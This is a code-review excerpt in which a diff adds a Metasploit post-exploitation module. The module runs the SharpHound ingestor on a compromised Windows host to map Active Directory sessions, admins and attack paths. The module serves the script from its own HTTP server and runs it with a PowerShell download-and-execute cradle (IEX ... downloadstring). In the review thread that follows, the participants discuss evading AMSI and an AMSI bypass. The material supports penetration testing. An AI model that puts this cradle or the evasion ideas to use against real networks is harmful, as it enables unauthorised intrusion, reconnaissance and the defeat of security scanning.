modules/post/windows/gather/bloodhound.rb

```diff
@@ -0,0 +1,60 @@
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Post::Windows::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'BloodHound Ingestor',
+      'Description'   => %q{
+        This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more. With this information BloodHound will easily identify highly complex attack paths that would otherwise be impossible to quickly identify within an Active Directory environment.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'h4ng3r <h4ng3r@computerpirate.me>' ],
+      'References'    => [ 'URL', 'https://github.com/BloodHoundAD/BloodHound/' ],
+      'Platform'      => [ 'win' ],
+      'Arch'          => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'  => [ 'meterpreter' ],
+    ))
+
+    register_options([
+      OptString.new('MAXLOOPTIME', [ true, 'MaxLoopTime in 0d0h0m0s format by default there is not max time', '0' ]),
+    ])
+
+  end
+
+  def on_request_uri(cli, _request)
+    base_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "SharpHound.ps1"))
+    send_response(cli, base_script)
+  end
+
+  def run
+    start_service()
+    uri = get_uri()
+
+    if not have_powershell?
+      fail_with(Failure::Unknown, "PowerShell is not installed")
+    end
+
+    tmp_path = get_env('TEMP')
+    process, _pid, _c = execute_script("IEX (new-object net.webclient).downloadstring('#{uri}'); Invoke-BloodHound -MaxLoopTime #{datastore['MAXLOOPTIME']} -CompressData -RemoveCSV -CSVFolder \"#{tmp_path}\"")
```

Comment:
Invoke-expression can make amsi unhappy, suggest "&(...)"

Reply:
I'm working to update the powershell with the amsi bypass. The "data/post/powershell/SharpHound.ps1" powershell is from the BloodHound framework itself, I tried to modify the minimum so I can update it with each BloodHound release. The SharpHound ingestor's output is several (3-5) CSV files or a zip file with all CSV inside. For a medium company with 200 hosts in the DC I have 4 CSV with 500K in total. Seems to much for an output console thats why I though using the zip is better.